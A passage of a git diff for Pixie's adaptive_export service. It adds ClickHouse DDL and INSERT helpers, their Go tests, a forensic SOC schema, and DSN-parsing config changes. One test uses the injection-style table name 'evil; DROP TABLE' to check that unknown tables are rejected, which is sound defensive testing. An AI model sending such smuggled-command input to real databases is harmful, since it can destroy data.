implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "errors" + "strings" + "testing" +) + +// TestDDL_ReturnsCanonicalForKnownTables — every table named in +// KnownTables can be extracted as a complete CREATE TABLE statement. +func TestDDL_ReturnsCanonicalForKnownTables(t *testing.T) { + for _, name := range KnownTables { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if !strings.HasPrefix(ddl, "CREATE TABLE IF NOT EXISTS forensic_db.") { + t.Fatalf("DDL(%q) wrong prefix: %q", name, ddl[:minInt(70, len(ddl))]) + } + if !strings.HasSuffix(ddl, ";") { + t.Fatalf("DDL(%q) does not terminate with ';'", name) + } + }) + } +} + +// TestDDL_PixieTablesIncludeNamespaceAndPod — every pixie table must +// declare namespace + pod columns (used by attribution JOINs). +func TestDDL_PixieTablesIncludeNamespaceAndPod(t *testing.T) { + for _, name := range PixieTables() { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if !strings.Contains(ddl, "namespace") { + t.Fatalf("%s missing namespace column", name) + } + if !strings.Contains(ddl, "pod") { + t.Fatalf("%s missing pod column", name) + } + }) + } +} + +// TestDDL_PixieTables_NoAnomalyHashColumn — pixie observation tables +// MUST NOT carry the hash inline; attribution is via JOIN. +func TestDDL_PixieTables_NoAnomalyHashColumn(t *testing.T) { + for _, name := range PixieTables() { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if strings.Contains(ddl, "anomaly_hash") || strings.Contains(ddl, "anomaly_hashes") { + t.Fatalf("pixie table %q must not carry anomaly_hash column; got:\n%s", name, ddl) + } + }) + } +} + +// TestDDL_AdaptiveAttribution_HasExpectedColumns — the attribution +// table is the operator's only write target. +func TestDDL_AdaptiveAttribution_HasExpectedColumns(t *testing.T) { + ddl, err := DDL("adaptive_attribution") + if err != nil { + t.Fatalf("DDL: %v", err) + } + for _, c := range []string{ + "anomaly_hash", "namespace", "pod", "comm", "pid", + "hostname", "t_start", "t_end", "last_seen", + } { + if !strings.Contains(ddl, c) { + t.Fatalf("adaptive_attribution missing column %q; got:\n%s", c, ddl) + } + } + if !strings.Contains(ddl, "ReplacingMergeTree(t_end)") { + t.Fatalf("adaptive_attribution must use ReplacingMergeTree(t_end); got:\n%s", ddl) + } +} + +// TestDDL_KubescapeLogs_PreservesAnomalyHash — kubescape_logs keeps its +// existing anomaly_hash DEFAULT ” column for pipeline compat. +func TestDDL_KubescapeLogs_PreservesAnomalyHash(t *testing.T) { + ddl, err := DDL("kubescape_logs") + if err != nil { + t.Fatalf("DDL: %v", err) + } + if !strings.Contains(ddl, "anomaly_hash") { + t.Fatalf("kubescape_logs lost anomaly_hash column: %s", ddl) + } +} + +// TestDDL_UnknownTable_ErrUnknownTable — defensive contract. +func TestDDL_UnknownTable_ErrUnknownTable(t *testing.T) { + for _, bad := range []string{"", "no_such_table", "process_events", "conn_stats"} { + _, err := DDL(bad) + if !errors.Is(err, ErrUnknownTable) { + t.Fatalf("DDL(%q) → %v, want ErrUnknownTable", bad, err) + } + } +} + +// TestDDL_DottedTableName_BacktickQuoted — schema.sql backtick-quotes +// dotted ClickHouse identifiers. +func TestDDL_DottedTableName_BacktickQuoted(t *testing.T) { + for _, name := range []string{"http2_messages.beta", "kafka_events.beta"} { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if !strings.Contains(ddl, "`"+name+"`") { + t.Fatalf("dotted table %q must be backtick-quoted; got:\n%s", name, ddl) + } + }) + } +} + +func minInt(a, b int) int { + if a < b { + return a + } + return b +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/insert.go b/src/vizier/services/adaptive_export/internal/clickhouse/insert.go new file mode 100644 index 00000000000..1d76c286760 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/insert.go @@ -0,0 +1,114 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "fmt" + "strings" +) + +// Columns returns the column names of forensic_db.
in +// declaration order, parsed from the embedded canonical schema.sql. +// Same defensive contract as DDL: unknown table → ErrUnknownTable. +func Columns(table string) ([]string, error) { + ddl, err := DDL(table) + if err != nil { + return nil, err + } + return parseColumnList(ddl) +} + +// InsertSQL returns the parameterized INSERT for forensic_db.
, +// ending in "... VALUES" so a driver's batch API can append rows. +// Column order matches Columns() exactly — callers MUST append values +// in that same order. Dotted ClickHouse identifiers are auto-quoted +// with backticks. +func InsertSQL(table string) (string, error) { + cols, err := Columns(table) + if err != nil { + return "", err + } + identifier := table + if strings.Contains(table, ".") { + identifier = "`" + table + "`" + } + return fmt.Sprintf("INSERT INTO forensic_db.%s (%s) VALUES", + identifier, strings.Join(cols, ", ")), nil +} + +// parseColumnList walks the body of a CREATE TABLE statement, returning +// the leading identifier of each non-comment, non-blank line up to the +// closing `)` that ends the column list. Defensive against the SQL +// dialect quirks present in our schema (LowCardinality(...), DEFAULT +// expressions, inline -- comments, multi-word types). +func parseColumnList(ddl string) ([]string, error) { + open := strings.Index(ddl, "(") + if open < 0 { + return nil, fmt.Errorf("malformed DDL: no opening paren") + } + body := ddl[open+1:] + // the closing paren of the column list is the first `)` at the + // matching depth, but our schema doesn't nest parens inside the + // column list except inside DEFAULT exprs (e.g. now64(3)) and + // LowCardinality(String). Track depth. + depth := 1 + end := -1 + for i, r := range body { + switch r { + case '(': + depth++ + case ')': + depth-- + if depth == 0 { + end = i + } + } + if end >= 0 { + break + } + } + if end < 0 { + return nil, fmt.Errorf("malformed DDL: no closing paren for column list") + } + body = body[:end] + + var cols []string + for _, raw := range strings.Split(body, "\n") { + line := strings.TrimSpace(raw) + if line == "" || strings.HasPrefix(line, "--") { + continue + } + // strip trailing comma + inline -- comment + if i := strings.Index(line, "--"); i >= 0 { + line = strings.TrimSpace(line[:i]) + } + line = strings.TrimSuffix(line, ",") + if line == "" { + continue + } + // first whitespace-separated token = column name + fields := strings.Fields(line) + if len(fields) == 0 { + continue + } + cols = append(cols, fields[0]) + } + if len(cols) == 0 { + return nil, fmt.Errorf("malformed DDL: no columns parsed") + } + return cols, nil +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go new file mode 100644 index 00000000000..ee66a17a85d --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go @@ -0,0 +1,109 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "errors" + "strings" + "testing" +) + +// TestColumns_AdaptiveAttribution — the operator's only write target. +// Column list must match the DDL exactly so the sink can append values +// in the right positional order. +func TestColumns_AdaptiveAttribution(t *testing.T) { + cols, err := Columns("adaptive_attribution") + if err != nil { + t.Fatalf("Columns: %v", err) + } + want := []string{ + "anomaly_hash", "namespace", "pod", "comm", "pid", + "hostname", "t_start", "t_end", "last_seen", + "last_rule_id", "n_anomalies", + } + if len(cols) != len(want) { + t.Fatalf("Columns(adaptive_attribution) length %d, want %d; got %v", len(cols), len(want), cols) + } + for i, c := range want { + if cols[i] != c { + t.Fatalf("col[%d] = %q, want %q (full=%v)", i, cols[i], c, cols) + } + } +} + +// TestColumns_PixieTablesIncludeNamespaceAndPod — every pixie table's +// column list contains namespace + pod (the JOIN keys against +// adaptive_attribution). +func TestColumns_PixieTablesIncludeNamespaceAndPod(t *testing.T) { + for _, table := range PixieTables() { + t.Run(table, func(t *testing.T) { + cols, err := Columns(table) + if err != nil { + t.Fatalf("Columns(%q): %v", table, err) + } + if !contains(cols, "namespace") { + t.Fatalf("%s missing namespace; cols=%v", table, cols) + } + if !contains(cols, "pod") { + t.Fatalf("%s missing pod; cols=%v", table, cols) + } + if contains(cols, "anomaly_hash") || contains(cols, "anomaly_hashes") { + t.Fatalf("%s must not carry hash inline; cols=%v", table, cols) + } + }) + } +} + +// TestInsertSQL_AdaptiveAttribution — the canonical INSERT used by the sink. +func TestInsertSQL_AdaptiveAttribution(t *testing.T) { + sql, err := InsertSQL("adaptive_attribution") + if err != nil { + t.Fatalf("InsertSQL: %v", err) + } + if !strings.HasPrefix(sql, "INSERT INTO forensic_db.adaptive_attribution (") { + t.Fatalf("bad prefix: %q", sql) + } + if !strings.HasSuffix(sql, ") VALUES") { + t.Fatalf("bad suffix: %q", sql) + } +} + +// TestInsertSQL_DottedTablesBacktickQuoted — INSERT statements for +// dotted ClickHouse identifiers must wrap the name in backticks. +func TestInsertSQL_DottedTablesBacktickQuoted(t *testing.T) { + for _, table := range []string{"http2_messages.beta", "kafka_events.beta"} { + t.Run(table, func(t *testing.T) { + sql, err := InsertSQL(table) + if err != nil { + t.Fatalf("InsertSQL(%q): %v", table, err) + } + if !strings.Contains(sql, "INSERT INTO forensic_db.`"+table+"` (") { + t.Fatalf("dotted table %q not backtick-quoted: %q", table, sql) + } + }) + } +} + +// TestInsertSQL_Unknown — defensive contract. +func TestInsertSQL_Unknown(t *testing.T) { + for _, bad := range []string{"", "evil; DROP TABLE"} { + _, err := InsertSQL(bad) + if !errors.Is(err, ErrUnknownTable) { + t.Fatalf("InsertSQL(%q) → %v, want ErrUnknownTable", bad, err) + } + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql new file mode 100644 index 00000000000..69c5021c5ea --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql @@ -0,0 +1,399 @@ +-- Forensic SOC ClickHouse schema (adaptive-write feature, design rev 2) +-- ---------------------------------------------------------------------- +-- Pixie type map (PixieTypeToClickHouseType): +-- TIME64NS → DateTime64(9), except event_time → DateTime64(3) +-- INT64 → Int64 | FLOAT64 → Float64 | STRING → String +-- BOOLEAN → UInt8 | UINT128 → String +-- Pixie's retention plugin adds: hostname String, event_time DateTime64(3) +-- We add: namespace String, pod String (used by adaptive_attribution JOINs). +-- +-- Engine convention for pixie observation tables: +-- ENGINE = MergeTree() +-- PARTITION BY toYYYYMM(event_time) +-- ORDER BY (hostname, event_time) +-- +-- The hash IS NOT stored on pixie observation rows. Attribution is via JOIN +-- against forensic_db.adaptive_attribution on (hostname, namespace, pod, time_). +-- See the adaptive_attribution definition at the bottom of this file. + +CREATE DATABASE IF NOT EXISTS forensic_db; + +-- Kubescape alerts (Vector kubescape_to_alerts sink, unchanged). +CREATE TABLE IF NOT EXISTS forensic_db.alerts ( + timestamp DateTime64(3), + ingest_time DateTime64(3) DEFAULT now64(3), + rule_id LowCardinality(String), + alert_name LowCardinality(String), + severity UInt8, + unique_id String, + cluster_name LowCardinality(String), + namespace LowCardinality(String), + pod_name String, + container_name LowCardinality(String), + container_id String, + workload_name LowCardinality(String), + workload_kind LowCardinality(String), + image LowCardinality(String), + infected_pid UInt32, + process_name LowCardinality(String), + process_cmdline String, + message String, + raw_event String +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(timestamp) + ORDER BY (timestamp, severity, namespace, rule_id) + TTL toDateTime(timestamp) + INTERVAL 90 DAY DELETE + SETTINGS index_granularity = 8192, ttl_only_drop_parts = 1; + +-- Kubescape raw logs — Vector kubescape_enrich sink writes here, the operator's +-- trigger reads it. anomaly_hash column kept here as DEFAULT '' for backwards +-- compat with any existing Vector pipeline that already populates it; the +-- operator does not depend on it being non-empty. +CREATE TABLE IF NOT EXISTS forensic_db.kubescape_logs ( + BaseRuntimeMetadata String, + CloudMetadata String, + RuleID String, + RuntimeK8sDetails String, + RuntimeProcessDetails String, + event String, + event_time UInt64, + hostname String, + level String DEFAULT '', + message String DEFAULT '', + msg String DEFAULT '', + processtree_depth String DEFAULT '', + anomaly_hash String DEFAULT '' +) ENGINE = MergeTree() + ORDER BY (event_time, hostname) + PARTITION BY toYYYYMM(toDateTime(event_time)) + TTL toDateTime(event_time) + INTERVAL 30 DAY DELETE + SETTINGS index_granularity = 8192; + +-- ============================================================================ +-- 13 Pixie socket_tracer tables — strongly predefined, namespace + pod added. +-- The retention scripts (PxL, user-defined or shipped defaults) MUST populate +-- namespace + pod via px.upid_to_namespace / px.upid_to_pod_name. +-- ============================================================================ + +-- http_events — pixie/src/stirling/source_connectors/socket_tracer/http_table.h +CREATE TABLE IF NOT EXISTS forensic_db.http_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + major_version Int64, + minor_version Int64, + content_type Int64, + req_headers String, + req_method String, + req_path String, + req_body String, + req_body_size Int64, + resp_headers String, + resp_status Int64, + resp_message String, + resp_body String, + resp_body_size Int64, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- http2_messages.beta — http2_messages_table.h +CREATE TABLE IF NOT EXISTS forensic_db.`http2_messages.beta` ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + stream_id Int64, + headers String, + body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- dns_events — dns_table.h +CREATE TABLE IF NOT EXISTS forensic_db.dns_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_header String, + req_body String, + resp_header String, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- redis_events — redis_table.h +CREATE TABLE IF NOT EXISTS forensic_db.redis_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd String, + req_args String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- mysql_events — mysql_table.h +CREATE TABLE IF NOT EXISTS forensic_db.mysql_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd Int64, + req_body String, + resp_status Int64, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- pgsql_events — pgsql_table.h +CREATE TABLE IF NOT EXISTS forensic_db.pgsql_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- cql_events — cass_table.h +CREATE TABLE IF NOT EXISTS forensic_db.cql_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_op Int64, + req_body String, + resp_op Int64, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- mongodb_events — mongodb_table.h +CREATE TABLE IF NOT EXISTS forensic_db.mongodb_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd String, + req_body String, + resp_status String, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- kafka_events.beta — kafka_table.h +CREATE TABLE IF NOT EXISTS forensic_db.`kafka_events.beta` ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd Int64, + client_id String, + req_body String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- amqp_events — amqp_table.h +CREATE TABLE IF NOT EXISTS forensic_db.amqp_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + frame_type Int64, + channel Int64, + method String, + payload String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- mux_events — mux_table.h +CREATE TABLE IF NOT EXISTS forensic_db.mux_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_type Int64, + req String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- tls_events — tls_table.h +CREATE TABLE IF NOT EXISTS forensic_db.tls_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + version Int64, + content_type Int64, + handshake String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- ============================================================================ +-- adaptive_attribution — operator's only write target in ClickHouse. +-- +-- One row per active anomaly hash per node. The operator inserts one row +-- per arriving kubescape_log on its node. ReplacingMergeTree(t_end) collapses +-- re-inserts to the row with the largest t_end — so each fresh anomaly with +-- the same hash extends the active window automatically; stale rows merge +-- away. +-- +-- Analyst joins: +-- +-- SELECT he.*, attr.anomaly_hash +-- FROM forensic_db.http_events he +-- ASOF INNER JOIN forensic_db.adaptive_attribution attr +-- ON he.hostname = attr.hostname +-- AND he.namespace = attr.namespace +-- AND he.pod = attr.pod +-- AND he.time_ >= attr.t_start +-- WHERE he.time_ <= attr.t_end +-- AND attr.anomaly_hash = ''; +-- +-- Boot-time rehydration of the operator's in-memory active set: +-- +-- SELECT * FROM forensic_db.adaptive_attribution FINAL +-- WHERE hostname = '' AND t_end > now64(9); +-- +-- DateTime64(9, 'UTC') — pin tz so bare-string serialization is +-- unambiguous; without it, CH parses incoming timestamps in the +-- server-session timezone and silently shifts values on non-UTC hosts. +-- ============================================================================ +CREATE TABLE IF NOT EXISTS forensic_db.adaptive_attribution ( + anomaly_hash String, + namespace String, + pod String, + comm String, + pid UInt64, + hostname String, + t_start DateTime64(9, 'UTC'), + t_end DateTime64(9, 'UTC'), + last_seen DateTime64(9, 'UTC'), + last_rule_id String, + n_anomalies UInt64 +) ENGINE = ReplacingMergeTree(t_end) + PARTITION BY toYYYYMM(t_start) + ORDER BY (hostname, anomaly_hash); diff --git a/src/vizier/services/adaptive_export/internal/config/BUILD.bazel b/src/vizier/services/adaptive_export/internal/config/BUILD.bazel index 4d19f27afab..393e71fe298 100644 --- a/src/vizier/services/adaptive_export/internal/config/BUILD.bazel +++ b/src/vizier/services/adaptive_export/internal/config/BUILD.bazel @@ -18,17 +18,12 @@ load("@io_bazel_rules_go//go:def.bzl", "go_library") go_library( name = "config", - srcs = [ - "config.go", - "definition.go", - ], + srcs = ["config.go"], importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/config", visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], deps = [ "//src/utils/shared/k8s", - "//src/vizier/services/adaptive_export/internal/script", "@com_github_sirupsen_logrus//:logrus", - "@in_gopkg_yaml_v2//:yaml_v2", "@io_k8s_apimachinery//pkg/apis/meta/v1:meta", "@io_k8s_client_go//kubernetes", "@io_k8s_client_go//rest", diff --git a/src/vizier/services/adaptive_export/internal/config/config.go b/src/vizier/services/adaptive_export/internal/config/config.go index fc500359dfe..7c518513d9a 100644 --- a/src/vizier/services/adaptive_export/internal/config/config.go +++ b/src/vizier/services/adaptive_export/internal/config/config.go @@ -33,20 +33,39 @@ import ( ) const ( - envVerbose = "VERBOSE" - envClickHouseDSN = "CLICKHOUSE_DSN" - envPixieClusterID = "PIXIE_CLUSTER_ID" - envPixieEndpoint = "PIXIE_ENDPOINT" - envPixieAPIKey = "PIXIE_API_KEY" - envClusterName = "CLUSTER_NAME" - envCollectInterval = "COLLECT_INTERVAL_SEC" - envDetectionInterval = "DETECTION_INTERVAL_SEC" - envDetectionLookback = "DETECTION_LOOKBACK_SEC" - defPixieHostname = "work.withpixie.ai:443" - boolTrue = "true" - defCollectInterval = 30 - defDetectionInterval = 10 - defDetectionLookback = 15 + envVerbose = "VERBOSE" + envClickHouseDSN = "CLICKHOUSE_DSN" + envClickHouseHost = "CLICKHOUSE_HOST" + envClickHousePort = "CLICKHOUSE_PORT" + envClickHouseUser = "CLICKHOUSE_USER" + envClickHousePass = "CLICKHOUSE_PASSWORD" + envClickHouseDB = "CLICKHOUSE_DATABASE" + envKubescapeTable = "KUBESCAPE_TABLE" + envPixieClusterID = "PIXIE_CLUSTER_ID" + envPixieEndpoint = "PIXIE_ENDPOINT" + envPixieAPIKey = "PIXIE_API_KEY" + envClusterName = "CLUSTER_NAME" + envCollectInterval = "COLLECT_INTERVAL_SEC" + envDetectionInterval = "DETECTION_INTERVAL_SEC" + envDetectionLookback = "DETECTION_LOOKBACK_SEC" + envExportMode = "EXPORT_MODE" + envExportQuietTicks = "EXPORT_QUIET_TICKS" + defPixieHostname = "work.pixie.austrianopencloudcommunity.org:443" + defClickHousePort = "9000" + defKubescapeTable = "kubescape_logs" + defExportMode = "auto" + defExportQuietTicks = 6 + boolTrue = "true" + defCollectInterval = 30 + defDetectionInterval = 10 + defDetectionLookback = 15 +) + +// ExportMode values. +const ( + ExportModeAuto = "auto" + ExportModeAlways = "always" + ExportModeNever = "never" ) var ( @@ -206,6 +225,32 @@ func setUpConfig() error { return err } + exportQuietTicks, err := getIntEnvWithDefault(envExportQuietTicks, defExportQuietTicks) + if err != nil { + return err + } + + exportMode := strings.ToLower(getEnvWithDefault(envExportMode, defExportMode)) + switch exportMode { + case ExportModeAuto, ExportModeAlways, ExportModeNever: + default: + return fmt.Errorf("invalid %s=%q (must be auto|always|never)", envExportMode, exportMode) + } + + // Parse the DSN into its parts; individual env vars override the parsed values. + dsnHost, dsnPort, dsnUser, dsnPass, dsnDB := parseDSN(clickhouseDSN) + chHost := getEnvWithDefault(envClickHouseHost, dsnHost) + chPort := getEnvWithDefault(envClickHousePort, firstNonEmpty(dsnPort, defClickHousePort)) + chUser := getEnvWithDefault(envClickHouseUser, dsnUser) + chPass := getEnvWithDefault(envClickHousePass, dsnPass) + chDB := getEnvWithDefault(envClickHouseDB, dsnDB) + chTable := getEnvWithDefault(envKubescapeTable, defKubescapeTable) + + // If individual fields were provided but CLICKHOUSE_DSN was not, build one. + if clickhouseDSN == "" && chHost != "" && chUser != "" { + clickhouseDSN = fmt.Sprintf("%s:%s@%s:%s/%s", chUser, chPass, chHost, chPort, chDB) + } + instance = &config{ settings: &settings{ buildDate: buildDate, @@ -213,14 +258,22 @@ func setUpConfig() error { version: integrationVersion, }, worker: &worker{ - clusterName: clusterName, - pixieClusterID: pixieClusterID, - collectInterval: collectInterval, - detectionInterval: detectionInterval, - detectionLookback: detectionLookback, + clusterName: clusterName, + pixieClusterID: pixieClusterID, + collectInterval: collectInterval, + detectionInterval: detectionInterval, + detectionLookback: detectionLookback, + exportMode: exportMode, + exportQuietTicks: exportQuietTicks, }, clickhouse: &clickhouse{ dsn: clickhouseDSN, + host: chHost, + port: chPort, + user: chUser, + password: chPass, + database: chDB, + table: chTable, userAgent: "pixie-clickhouse/" + integrationVersion, }, pixie: &pixie{ @@ -232,6 +285,50 @@ func setUpConfig() error { return instance.validate() } +// parseDSN best-effort splits `user:pass@host:port/db`. Missing parts come back empty. +func parseDSN(dsn string) (string, string, string, string, string) { + if dsn == "" { + return "", "", "", "", "" + } + at := strings.LastIndex(dsn, "@") + if at < 0 { + return "", "", "", "", "" + } + creds := dsn[:at] + rest := dsn[at+1:] + + var user, pass string + if i := strings.Index(creds, ":"); i >= 0 { + user = creds[:i] + pass = creds[i+1:] + } else { + user = creds + } + + var db string + if i := strings.Index(rest, "/"); i >= 0 { + db = rest[i+1:] + rest = rest[:i] + } + var host, port string + if i := strings.Index(rest, ":"); i >= 0 { + host = rest[:i] + port = rest[i+1:] + } else { + host = rest + } + return host, port, user, pass, db +} + +func firstNonEmpty(vals ...string) string { + for _, v := range vals { + if v != "" { + return v + } + } + return "" +} + func getEnvWithDefault(key, defaultValue string) string { value := os.Getenv(key) if value == "" { @@ -325,29 +422,46 @@ func (s *settings) BuildDate() string { type ClickHouse interface { DSN() string + Host() string + Port() string + User() string + Password() string + Database() string + Table() string UserAgent() string validate() error } type clickhouse struct { dsn string + host string + port string + user string + password string + database string + table string userAgent string } func (c *clickhouse) validate() error { if c.dsn == "" { - return fmt.Errorf("missing required env variable '%s'", envClickHouseDSN) + return fmt.Errorf("missing required env variable '%s' (or provide %s/%s/%s/%s/%s)", + envClickHouseDSN, envClickHouseHost, envClickHousePort, envClickHouseUser, envClickHousePass, envClickHouseDB) + } + if c.host == "" || c.user == "" || c.database == "" { + return fmt.Errorf("ClickHouse host/user/database could not be derived from %s=%q", envClickHouseDSN, c.dsn) } return nil } -func (c *clickhouse) DSN() string { - return c.dsn -} - -func (c *clickhouse) UserAgent() string { - return c.userAgent -} +func (c *clickhouse) DSN() string { return c.dsn } +func (c *clickhouse) Host() string { return c.host } +func (c *clickhouse) Port() string { return c.port } +func (c *clickhouse) User() string { return c.user } +func (c *clickhouse) Password() string { return c.password } +func (c *clickhouse) Database() string { return c.database } +func (c *clickhouse) Table() string { return c.table } +func (c *clickhouse) UserAgent() string { return c.userAgent } type Pixie interface { APIKey() string @@ -390,15 +504,19 @@ type Worker interface { CollectInterval() int64 DetectionInterval() int64 DetectionLookback() int64 + ExportMode() string + ExportQuietTicks() int64 validate() error } type worker struct { - clusterName string - pixieClusterID string - collectInterval int64 - detectionInterval int64 - detectionLookback int64 + clusterName string + pixieClusterID string + collectInterval int64 + detectionInterval int64 + detectionLookback int64 + exportMode string + exportQuietTicks int64 } func (a *worker) validate() error { @@ -408,22 +526,10 @@ func (a *worker) validate() error { return nil } -func (a *worker) ClusterName() string { - return a.clusterName -} - -func (a *worker) PixieClusterID() string { - return a.pixieClusterID -} - -func (a *worker) CollectInterval() int64 { - return a.collectInterval -} - -func (a *worker) DetectionInterval() int64 { - return a.detectionInterval -} - -func (a *worker) DetectionLookback() int64 { - return a.detectionLookback -} +func (a *worker) ClusterName() string { return a.clusterName } +func (a *worker) PixieClusterID() string { return a.pixieClusterID } +func (a *worker) CollectInterval() int64 { return a.collectInterval } +func (a *worker) DetectionInterval() int64 { return a.detectionInterval } +func (a *worker) DetectionLookback() int64 { return a.detectionLookback } +func (a *worker) ExportMode() string { return a.exportMode } +func (a *worker) ExportQuietTicks() int64 { return a.exportQuietTicks } diff --git a/src/vizier/services/adaptive_export/internal/config/definition.go b/src/vizier/services/adaptive_export/internal/config/definition.go deleted file mode 100644 index fd772022753..00000000000 --- a/src/vizier/services/adaptive_export/internal/config/definition.go +++ /dev/null @@ -1,66 +0,0 @@ -// Copyright 2018- The Pixie Authors. -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -// SPDX-License-Identifier: Apache-2.0 - -package config - -import ( - "io/ioutil" - "os" - "path/filepath" - "strings" - - "gopkg.in/yaml.v2" - - "px.dev/pixie/src/vizier/services/adaptive_export/internal/script" -) - -const scriptExtension = ".yaml" - -// ReadScriptDefinitions reads the script definition from the given directory path. -// Only .yaml files are read and subdirectories are not traversed. -func ReadScriptDefinitions(dir 